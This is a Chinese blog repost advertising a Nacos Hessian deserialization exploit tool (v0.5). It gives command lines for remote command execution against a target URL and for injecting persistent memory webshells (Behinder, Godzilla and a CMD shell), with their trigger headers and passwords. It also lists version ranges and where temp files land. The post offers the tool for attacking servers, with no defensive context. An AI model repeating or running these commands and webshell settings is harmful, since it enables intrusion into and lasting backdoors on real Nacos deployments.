6!Nacos反序列化漏洞利用工具v0.5

项目简介

刨洞安全@凉风 师傅写的一个 Nacos Hessian 反序列化漏洞利用工具,目前已更新到v0.5,欢迎Star!

关注【Hack分享吧】公众号,回复关键字【230706】获取下载链接

图片

使用方法

1. 自动注入内存马并执行命令 java -jar NacosRce.jar Url Jraft端口 "Command"

java -jar NacosRce.jar http://192.168.90.1:8848  7848 "whoami"

2. 只注入内存马

java -jar NacosRce.jar http://192.168.90.1:8848 7848 memshell

一、冰蝎内存马:

需要设置请求头x-client-data:rebeyond
设置Referer:https://www.google.com/
路径随意
密码rebeyond

图片

二、哥斯拉内存马:

需要设置请求头x-client-data:godzilla
设置Referer:https://www.google.com/
路径随意
密码是pass和key

图片

三、CMD内存马:

需要设置请求头x-client-data:cmd
设置Referer:https://www.google.com/
请求头cmd:要执行的命令

图片

v0.5版本实现了

不出网漏洞利用
可多次发起漏洞利用
同时注入冰蝎/哥斯拉/CMD内存马
内存马对nacos多版本进行了兼容
修复windows的bug

 tips:

请用jdk1.8
适用于Nacos 2.x <= 2.2.2
非集群的也能打哦
此内存马重启nacos依然存活

注意事项

Windows如用下面的方式执行,注入内存马时会在以下目录生成两个临时文件

java -jar NacosRce.jar http://192.168.90.1:8848  7848 "whoami" windows

C:\Windows\Temp\nacos_data_temp
C:\Windows\Temp\nacos_data_temp.class

如果没有在最后加windows,临时文件会在以下目录,所以权限足够的话,不指定windows也能打成功,没打成功也许是因为没权限操作C盘或其他原因

/tmp/nacos_data_temp
/tmp/nacos_data_temp.class

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值